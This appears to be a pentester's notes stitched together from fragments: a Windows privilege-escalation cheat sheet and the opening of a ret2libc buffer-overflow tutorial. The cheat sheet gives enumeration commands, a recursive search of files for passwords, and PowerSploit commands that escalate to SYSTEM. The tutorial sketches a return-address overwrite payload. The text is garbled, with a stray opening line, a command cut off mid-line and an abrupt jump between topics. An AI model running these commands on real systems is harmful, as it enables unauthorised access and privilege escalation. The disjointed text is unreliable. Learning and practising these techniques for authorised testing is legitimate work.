Its not available to public yet.
# Systeminfo systeminfo hostname # Especially good with hotfix info wmic qfe get Caption,Description,HotFixID,InstalledOn # What users/localgroups are on the machine? net users net localgroups net localgroup Administrators net user morph3 # Crosscheck local and domain too net user morph3 /domain net group Administrators /domain # Network information ipconfig /all route print arp -A # To see what tokens we have whoami /priv # Recursive string scan findstr /spin "password" *.* # Running processes tasklist /SVC # Network connections netstat -ano # Search for writeable directories dir /a-r-d /s /b ### Some good one-liners # Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths): sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
# PowerShellMafia # Use always dev branch others are shit. https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks" powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System" # Sherlock https://github.com/rasta-mouse/Sherlock # Unquoted paths wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v
* It is a 64 bit dynamically linked binary, nx and aslr is enabled *
There are many things to be done in binary analyzation but I will just mainly focus on Ret2Libc attack.
You can use many other tools but I will use those mainly.
- pwntools (python library)
- A reverse engineering tool (gHidra , IDA etc.)
- First thing first,
- We need to analyze our binary in order to determine what kind of attack vector we need to use
Overwriting the return address of the stack with overflowing the buffer allows us to return another malicious address which ends up with code execution.
Keep that in mind if NX is enabled we can't just directly jump to shellcode
junk_buf + system_call + exit_addr + /bin/sh